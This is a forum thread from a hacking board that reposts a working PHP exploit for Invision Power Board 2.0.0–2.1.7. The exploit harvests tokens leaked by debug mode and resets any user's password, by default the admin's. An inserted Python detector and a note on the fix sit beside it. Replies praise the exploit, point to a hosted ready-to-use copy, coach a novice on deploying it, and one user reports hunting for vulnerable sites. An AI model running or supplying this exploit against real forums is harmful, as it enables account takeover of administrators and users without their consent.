FORUM DARKERS

Security & Hacking => Bugs | Exploits | Vulnerabilities => Topic started by: insanity on 01 November 2006, 02:31:16 PM

Title: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: insanity on 01 November 2006, 02:31:16 PM
<?php
/*

 Debug Mode password change vulnerability
 Affects Invision Power Board 2.0.0 to 2.1.7
 by Rapigator

 This works if:

 "Debug Level" is set to 3
 or
 Enable SQL Debug Mode is turned on

 In General Configuration of the forum software.

*/

// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";

// An existing user's login name
$name = "admin";

// The new password (3-32 characters)
$pass = "1234";

// You can use a proxy... (leave empty for a direct connection)
$proxy = "";
// $proxy = "1.2.3.4:8080";



// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);

// Step 1: fetch the registration page (act=Reg&CODE=10). With Debug Level 3 the
// forum echoes every query it ran into the HTML, including the INSERT into
// <prefix>_reg_antispam that carries the fresh regid/regcode pair for this visitor.
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
    $prefix  = $regs[1];
    $regid   = $regs[2];
    $regcode = $regs[3];
} else {
    // Debug Level 3 is off: try SQL Debug Mode instead, which prints the
    // queries unstyled when &debug=1 is appended to the URL.
    $suffix = "&debug=1";
    $curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
    curl_setopt($curl, CURLOPT_PROXY, $proxy);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    $page = curl_exec($curl);
    curl_close($curl);
    if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
        $prefix  = $regs[1];
        $regid   = $regs[2];
        $regcode = $regs[3];
    }
}
if (!isset($regid) || !isset($regcode)) {
    echo "Error: Probably not vulnerable, or no forum found";
    exit;
}

// Step 2: submit a lost-password request (CODE=11) for the target user, reusing
// the harvested regid/regcode. The echoed INSERT into <prefix>_validating leaks
// the validation key (vid) and the member_id of that user.
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}&regid={$regid}&reg_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/<span class=\'green\'>INSERT<\/span> INTO <span class=\'purple\'>'.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
    change_pass($regcode, $regid, $regs[1], $regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
    change_pass($regcode, $regid, $regs[1], $regs[2]);
}

// Step 3: complete the lost-password flow (CODE=03&type=lostpass) with the
// leaked uid/aid pair and the attacker-chosen password.
function change_pass($regcode, $regid, $vid, $userid) {
    // $suffix is declared global here as well; the original omitted it, so the
    // &debug=1 fallback never reached this request.
    global $site, $proxy, $name, $pass, $suffix;
    $curl = curl_init($site.$suffix);
    curl_setopt($curl, CURLOPT_PROXY, $proxy);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curl, CURLOPT_POST, 1);
    curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&aid={$vid}&regid={$regid}&reg_code={$regcode}&pass1={$pass}&pass2={$pass}");
    curl_setopt($curl, CURLOPT_TIMEOUT, 10);
    $page = curl_exec($curl);
    curl_close($curl);
    echo "Password Changed!";
    exit;
}
?>


# milw0rm.com [2006-11-01]
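Added example, not part of the milw0rm exploit above or of Invision Power Board: a Python checker a forum administrator can run over the HTML of their own registration page to confirm whether the SQL debug output the exploit depends on is being echoed. It reuses the two query shapes the exploit matches (the coloured Debug Level 3 form and the plain `&debug=1` form) and reports the secret tokens that would be exposed: regid/regcode from `*_reg_antispam` and vid/member_id from `*_validating`. The sample pages, the table prefix `ibf`, the token values and the IP address are constructed for illustration; fetching the live page is left to the caller.

```python
"""Detect the IPB debug-mode SQL leak that the exploit above harvests."""
import re
from dataclasses import dataclass
from typing import Dict, Optional, Pattern

# Debug Level 3 wraps each query in coloured <span>s; "&debug=1" prints it plain.
# The INSERT shapes are the ones the exploit matches; the table prefix is captured.
_ANTISPAM: Dict[str, Pattern] = {
    "styled": re.compile(
        r"<span class='green'>INSERT</span> INTO <span class='purple'>(\w*?)_reg_antispam</span> "
        r"\(regid,regcode,ip_address,ctime\) VALUES\('(\w{32})',(\d*?),"
    ),
    "plain": re.compile(
        r"INSERT INTO (\w*?)_reg_antispam "
        r"\(regid,regcode,ip_address,ctime\) VALUES\('(\w{32})',(\d*?),"
    ),
}
_VALIDATING: Dict[str, Pattern] = {
    "styled": re.compile(
        r"<span class='green'>INSERT</span> INTO <span class='purple'>(\w*?)_validating</span> "
        r"\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) "
        r"VALUES\('(\w{32})',(\d{1,32}?),"
    ),
    "plain": re.compile(
        r"INSERT INTO (\w*?)_validating "
        r"\(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address\) "
        r"VALUES\('(\w{32})',(\d{1,32}?),"
    ),
}


@dataclass(frozen=True)
class Leak:
    prefix: str   # table prefix, e.g. "ibf"
    token: str    # regid (antispam) or vid (validating): 32 word characters
    secret: str   # regcode (antispam) or member_id (validating): digits
    fmt: str      # "styled" (Debug Level 3) or "plain" (&debug=1)


def _first_match(patterns: Dict[str, Pattern], html: str) -> Optional[Leak]:
    for fmt, rx in patterns.items():
        m = rx.search(html)
        if m:
            return Leak(m.group(1), m.group(2), m.group(3), fmt)
    return None


def reg_antispam_leak(html: str) -> Optional[Leak]:
    """Tokens the exploit harvests from act=Reg&CODE=10, or None if absent."""
    return _first_match(_ANTISPAM, html)


def validating_leak(html: str) -> Optional[Leak]:
    """vid/member_id the exploit harvests from the CODE=11 response, or None."""
    return _first_match(_VALIDATING, html)


def leaks_debug_sql(html: str) -> bool:
    """True if any query the exploit relies on is echoed into the page."""
    return reg_antispam_leak(html) is not None or validating_leak(html) is not None


# Constructed sample responses (not captured from a real forum).
SAMPLE_DEBUG_LEVEL_3 = (
    "<html><body><form>...registration form...</form>\n"
    "<div class='debug'><span class='green'>INSERT</span> INTO "
    "<span class='purple'>ibf_reg_antispam</span> (regid,regcode,ip_address,ctime) "
    "VALUES('0123456789abcdef0123456789abcdef',48271,'203.0.113.5',1162381876)</div>"
    "</body></html>"
)
SAMPLE_DEBUG_PARAM = (
    "INSERT INTO ibf_reg_antispam (regid,regcode,ip_address,ctime) "
    "VALUES('0123456789abcdef0123456789abcdef',48271,'203.0.113.5',1162381876)\n"
)
SAMPLE_VALIDATING = (
    "<span class='green'>INSERT</span> INTO <span class='purple'>ibf_validating</span> "
    "(vid,member_id,real_group,temp_group,entry_date,coppa_user,lost_pass,ip_address) "
    "VALUES('fedcba9876543210fedcba9876543210',1,4,4,1162381900,0,1,'203.0.113.5')"
)
SAMPLE_CLEAN = "<html><body><form>...registration form...</form></body></html>"

if __name__ == "__main__":
    for label, page in [("debug level 3", SAMPLE_DEBUG_LEVEL_3), ("&debug=1", SAMPLE_DEBUG_PARAM),
                        ("validating", SAMPLE_VALIDATING), ("clean", SAMPLE_CLEAN)]:
        print(f"{label:14s} leaking={leaks_debug_sql(page)} "
              f"antispam={reg_antispam_leak(page)} validating={validating_leak(page)}")
```

Run it against the output of a GET to `index.php?act=Reg&CODE=10` (and the same URL with `&debug=1`) on the forum you administer; any non-None result means the registration and lost-password secrets are readable by every anonymous visitor, and the fix is to set Debug Level back to 0 and turn off SQL Debug Mode in General Configuration.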
Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Fvox on 11 November 2006, 02:51:42 PM
Very good, man!

wuefez had already passed me the link to the site:
http://www.runescapebr.com/ipb.php


but I don't even know if he had the source
Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Anonymous on 12 December 2006, 09:08:05 AM
Very good!...
Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Security on 13 December 2006, 12:23:46 AM
Very good, insanity, nice :D
Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: RT on 13 December 2006, 02:42:43 AM
Really, very good indeed..
Nice one, insanity  ;D
Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: TEAM on 08 January 2007, 11:27:03 PM
Man, I don't understand any of this, but I want to learn. Where do I put this code? Do I have to download something?
Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Sladrak on 09 January 2007, 12:48:07 AM
Quote from: "TEAM": Man, I don't understand any of this, but I want to learn. Where do I put this code? Do I have to download something?

If you go to this site http://www.runescapebr.com/ipb.php you will find the exploit ready to use, as our friends Fvox and Wufez said.
But to get it working you would have to host it on a server that supports PHP...
Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: TEAM on 09 January 2007, 12:54:20 AM
Ah.. if I find some host to host http://www.runescapebr.com/ipb.php

I'll host it and then it's just a matter of entering the site's URL, then the login, then the password??

But what about this code the guy posted?
Is it inside that site?
Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: fast on 23 January 2007, 05:41:19 AM
I couldn't find ANY vulnerable site :S, I searched a lot..
Title: Re: Invision Power Board <= 2.1.7 (Debug) Remote Password Change Exploit
Post by: Anonymous on 03 February 2007, 10:04:42 PM
Good Topic^^ :)